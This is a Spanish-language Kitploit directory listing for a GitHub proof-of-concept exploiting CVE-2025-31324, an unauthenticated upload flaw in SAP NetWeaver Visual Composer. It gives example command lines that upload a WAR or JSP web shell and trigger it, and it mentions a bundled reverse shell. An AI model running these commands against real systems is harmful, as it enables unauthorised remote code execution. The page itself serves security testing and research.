Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31324_PoC_SAP — Prueba de concepto para CVE-2025-31324: Carga no autenticada en SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Herramientas/GitHubGitHub/abrewer251/cve-2025-31324_poc_sap
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubabrewer251/cve-2025-31324_poc_sap

CVE-2025-31324_PoC_SAP

Prueba de concepto para CVE-2025-31324: Carga no autenticada en SAP NetWeaver Visual Composer Metadata Uploader

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
131hace 1 añoAún no revisado
Compartir

CVE-2025-31324_PoC

Proof-of-Concept para CVE-2025-31324: Subida no autenticada en el cargador de metadatos de SAP NetWeaver Visual Composer

Este script realiza:

  1. Subida de archivo al endpoint vulnerable (a través del host/puerto de subida)
  2. Disparador opcional mediante HTTP GET (a través del host/puerto de disparo)
  3. Validación/registro básico de respuestas

Ejemplo de uso: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developerserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

También tienes la capacidad de subir un archivo .war si así deseas ejecutarlo. cache.jsp es una reverse shell que te dará acceso una vez dentro del sistema. (Todavía estamos solucionando problemas allí)

Aviso legal

Esto está destinado únicamente a fines educativos y no debe utilizarse para actividades maliciosas. Asegúrate siempre de tener los permisos necesarios y de seguir las pautas éticas al probar o investigar vulnerabilidades de seguridad.

Para cualquier pregunta o aclaración, no dudes en contactarnos. ¡Mantente seguro y protegido!

Descargar herramienta